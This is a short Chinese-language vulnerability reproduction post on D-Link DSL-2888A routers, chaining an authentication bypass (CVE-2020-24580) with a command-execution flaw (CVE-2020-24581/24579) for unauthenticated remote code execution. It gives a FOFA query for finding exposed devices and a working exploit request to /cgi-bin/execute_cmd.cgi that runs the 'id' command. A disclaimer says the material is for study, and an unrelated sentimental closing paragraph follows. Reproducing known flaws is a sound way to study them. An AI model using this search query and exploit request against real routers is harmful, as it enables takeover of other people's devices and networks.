D-Link (CVE-2020-24581/24579) RCE漏洞复现

简介

D-Link DSL-2888A AU_2.31_V1.1.47ae55之前版本漏洞源于包含一个execute cmd.cgi特性、该特性允许经过身份验证的用户执行操作系统命令,在该版本固件中同时存在着一个不安全认证漏洞(CVE-2020-24580),在登录界面输入任意密码就可以成功访问路由器界面,组合这两个漏洞以实现未授权的任意代码执行。

fofa

body="DSL-2888A"

D-Link (CVE-2020-24581/24579) RCE漏洞复现_第1张图片

影响范围

AU_2.31_V1.1.47ae55 <=

EG_1.00b4

漏洞复现

访问主页,大概是这个样子的,默认主页路径“/page/login/login.html”

D-Link (CVE-2020-24581/24579) RCE漏洞复现_第2张图片

exp

这里不管什么参数都会识别,参数没有进行限制

/cgi-bin/execute_cmd.cgi?exp=&exp=id

D-Link (CVE-2020-24581/24579) RCE漏洞复现_第3张图片

成功执行了 "id" 命令

声明
提供的技术仅供学习参考测试,利用本文提供的信息造成的直接或简介损失由使用者自行承担。


结语

当陪你的那个人要下车时,即便你再不舍,也要心存感激,挥手告别,每一个人的故事最初都是极具温柔的开头,但往往故事的结尾配不上整个开头,但每一个意难平的结果,都是我们最好的结局。

你可能感兴趣的:(漏洞复现,安全,web安全,安全架构)